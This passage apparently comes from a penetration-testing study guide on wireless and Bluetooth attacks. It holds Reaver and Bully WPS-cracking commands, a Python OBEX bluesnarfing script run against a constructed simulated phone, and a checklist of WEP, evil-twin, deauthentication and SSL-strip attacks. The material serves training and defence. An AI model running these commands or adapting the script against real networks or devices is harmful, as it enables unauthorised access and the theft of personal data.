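With a proper random E-S1/E-S2 the offline search has 2^128 more unknowns and is hopeless, which is the whole difference between a Pixie-Dust-vulnerable AP and a sound one; the online half-split weakness, by contrast, is in the protocol itself and only a lockout or disabling WPS mitigates it.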
reaver -i wlanmon0 -b 00:90:4C:C1:AB:CD -p "" -N -vv
Another Kali tool you can use is Bully. It sometimes works when Reaver does not. Example:
bully wlanmon0 -b 00:90:12:34:AB:CD -e linksys -c 11
If you need to update Kali (and thus the tools), use these commands:
apt-get update
apt-get dist-upgrade
Bluejacking is a method used by attackers to send unwanted Bluetooth messages from smartphones, mobile phones, tablets, and laptops to other Bluetooth-enabled devices. Because Bluetooth requires relatively close proximity to the target device (usually within 30 feet, about 10 meters for a typical Class 2 radio), bluejacking must also be done within this range to be effective. Most bluejacking attacks involve sending the victim a text-based message, image, or video, and are typically just an annoyance. There is no overt “hijacking” of the user’s device, just the reception of unsolicited media.
However, bluejacking can be used as a vector to carry out more insidious attacks. For example, you might be able to socially engineer a user into downloading malware or providing you with access credentials if you send a convincing message to their device over Bluetooth. The user may be more inclined to trust the message since Bluetooth is not as common as text-based or email-based phishing vectors.
Bluejacking does not require any specialized tools and can be simply performed by sending a message to nearby, discoverable devices using the attacking device’s Bluetooth app. Bluejacking is ineffective when devices are in non-discoverable mode.
Bluesnarfing is a more overtly malicious attack in which an attacker reads information from a victim’s Bluetooth device. The end goal is to glean sensitive data from the victim, like their contacts, calendars, email messages, text messages, and more.
Bluetooth uses the Object Exchange (OBEX) protocol to transfer objects between devices. To conduct a bluesnarfing attack, you connect to a device’s OBEX Object Push Profile (OPP), which is meant only for receiving pushed objects and so usually does not require authentication. Instead of pushing, you submit an OBEX GET request (analogous to an HTTP GET) naming files whose paths are standardized by the Infrared Mobile Communications (IrMC) specification. For example, telecom/pb.vcf is the phone book, telecom/cal.vcs the calendar, and telecom/devinfo.txt information about the device. Devices with vulnerable OBEX implementations honor such GET requests over the push channel and return any file whose name you know or have correctly guessed.
As with bluejacking, bluesnarfing is ineffective against devices with Bluetooth set to non-discoverable mode. It is also largely a legacy issue: the original flaws were found in phones from the early 2000s, and modern Bluetooth stacks only let the push service receive objects and require pairing and user authorization for anything else.
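The following is an added example, not code from the page, that shows the OBEX exchange described above on the wire: the CONNECT request, a GET naming an IrMC path, and the responses, with a constructed ModelPhone standing in for the target in both its vulnerable form (serves any known path over the unauthenticated push channel) and its hardened form (refuses GET unless the link is paired). The packet and header encodings follow the OBEX specification; the RFCOMM transport that would carry these bytes to a real device is left out.

```python
import struct

OBEX_CONNECT, OBEX_GET_FINAL = 0x80, 0x83          # request opcodes (high bit = final packet)
RSP_OK, RSP_BAD_REQUEST, RSP_UNAUTHORIZED, RSP_NOT_FOUND = 0xA0, 0xC0, 0xC1, 0xC4
HDR_NAME, HDR_TYPE, HDR_END_OF_BODY = 0x01, 0x42, 0x49   # header IDs; top two bits give the encoding


def packet(opcode: int, payload: bytes = b"") -> bytes:
    """OBEX packet: opcode or response code, 2-byte big-endian total length, payload."""
    return bytes([opcode]) + struct.pack(">H", 3 + len(payload)) + payload


def hdr_unicode(hid: int, text: str) -> bytes:
    """Encoding 0x00: null-terminated UTF-16BE text; the length covers the 3 header bytes too."""
    data = text.encode("utf-16-be") + b"\x00\x00"
    return bytes([hid]) + struct.pack(">H", 3 + len(data)) + data


def hdr_bytes(hid: int, data: bytes) -> bytes:
    """Encoding 0x40: byte sequence with a 2-byte length."""
    return bytes([hid]) + struct.pack(">H", 3 + len(data)) + data


def connect_request(max_packet_len: int = 0x2000) -> bytes:
    """CONNECT: OBEX version 1.0, flags 0, maximum packet length we accept."""
    return packet(OBEX_CONNECT, b"\x10\x00" + struct.pack(">H", max_packet_len))


def get_request(name: str, mime: str = None) -> bytes:
    """GET with final bit set: a Name header (and optional Type header) selects the object."""
    headers = hdr_unicode(HDR_NAME, name)
    if mime:
        headers += hdr_bytes(HDR_TYPE, mime.encode() + b"\x00")
    return packet(OBEX_GET_FINAL, headers)


def parse_packet(pkt: bytes):
    code, length = pkt[0], struct.unpack_from(">H", pkt, 1)[0]
    if length != len(pkt):
        raise ValueError("length field does not match packet size")
    return code, pkt[3:]


def parse_headers(buf: bytes) -> dict:
    """Walk a header sequence; the two high bits of each ID select the encoding."""
    i, out = 0, {}
    while i < len(buf):
        hid, enc = buf[i], buf[i] & 0xC0
        if enc in (0x00, 0x40):
            length = struct.unpack_from(">H", buf, i + 1)[0]
            value = buf[i + 3:i + length]
            if enc == 0x00:
                value = value[:-2].decode("utf-16-be")
            i += length
        elif enc == 0x80:                     # single byte value
            value, i = buf[i + 1], i + 2
        else:                                 # 4-byte value
            value, i = struct.unpack_from(">I", buf, i + 1)[0], i + 5
        out[hid] = value
    return out


class ModelPhone:
    """Constructed target. require_pairing=False: serves any IrMC path over the
    unauthenticated push channel (the bluesnarfing flaw). True: refuses GET
    unless the link is bonded, as modern stacks do."""
    FILES = {
        "telecom/pb.vcf": b"BEGIN:VCARD\r\nFN:Alice Example\r\nTEL:+15550100\r\nEND:VCARD\r\n",
        "telecom/cal.vcs": b"BEGIN:VCALENDAR\r\nEND:VCALENDAR\r\n",
        "telecom/devinfo.txt": b"MANU:ExampleCo\r\nMOD:X1\r\n",
    }

    def __init__(self, require_pairing: bool):
        self.require_pairing, self.connected = require_pairing, False

    def handle(self, pkt: bytes, paired: bool = False) -> bytes:
        op, payload = parse_packet(pkt)
        if op == OBEX_CONNECT:
            self.connected = True
            return packet(RSP_OK, b"\x10\x00" + struct.pack(">H", 0x2000))
        if op == OBEX_GET_FINAL and self.connected:
            if self.require_pairing and not paired:
                return packet(RSP_UNAUTHORIZED)
            data = self.FILES.get(parse_headers(payload).get(HDR_NAME))
            if data is None:
                return packet(RSP_NOT_FOUND)
            return packet(RSP_OK, hdr_bytes(HDR_END_OF_BODY, data))
        return packet(RSP_BAD_REQUEST)


def bluesnarf(phone: ModelPhone, names=("telecom/pb.vcf", "telecom/cal.vcs",
                                        "telecom/devinfo.txt", "telecom/notes.txt")) -> dict:
    """CONNECT once, then GET each well-known IrMC path and keep whatever comes back."""
    phone.handle(connect_request())
    loot = {}
    for name in names:
        mime = "text/x-vcard" if name.endswith(".vcf") else None
        code, payload = parse_packet(phone.handle(get_request(name, mime)))
        if code == RSP_OK:
            loot[name] = parse_headers(payload)[HDR_END_OF_BODY]
    return loot
```

The vulnerable model answers with the phone book, calendar and device info and returns Not Found for a path it does not have; the hardened model answers Unauthorized to every GET on an unpaired link, which is the behaviour a defender should expect from a current device.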
Guidelines for Exploiting Wireless and RF-Based Vulnerabilities
When exploiting wireless and RF-based vulnerabilities:
- Use aircrack-ng or similar tools to crack keys on Wi-Fi networks secured with WEP.
- Use an ARP replay attack to make the access point generate the tens of thousands of IVs needed to crack a WEP key.
- Speed up the WEP cracking process by launching a fragmentation attack using aireplay-ng.
- Use the PRGA obtained from a fragmentation attack to craft a packet with packetforge-ng.
- Send a crafted packet to an access point to easily obtain thousands of IVs.
- Check the laws in your area before using radio jamming devices.
- Use a tool like aireplay-ng to knock clients off a WAP.
- Spoof MAC addresses in deauthentication attacks to knock specific targets off a WAP.
- Use evil twins to entice users to connect to your rogue AP.
- Use Karma attacks to trick a client sending a probing request into connecting to your evil twin.
- Use SSL strip with an evil twin to downgrade a user’s HTTPS session and act as a man-in-the-middle.
- Place your wireless interface in monitor mode (not merely promiscuous mode) to receive every 802.11 frame on the channel.
- Use airodump-ng to sniff the four-way wireless handshake for WPA/WPA2 key cracking.
- Use online brute forcing to crack a WPS PIN.
- Use the Pixie Dust attack to conduct offline cracking of vulnerable APs.
- Use bluejacking to send unsolicited messages to discoverable Bluetooth devices in range.
- Use bluesnarfing to read sensitive information from discoverable Bluetooth devices in range.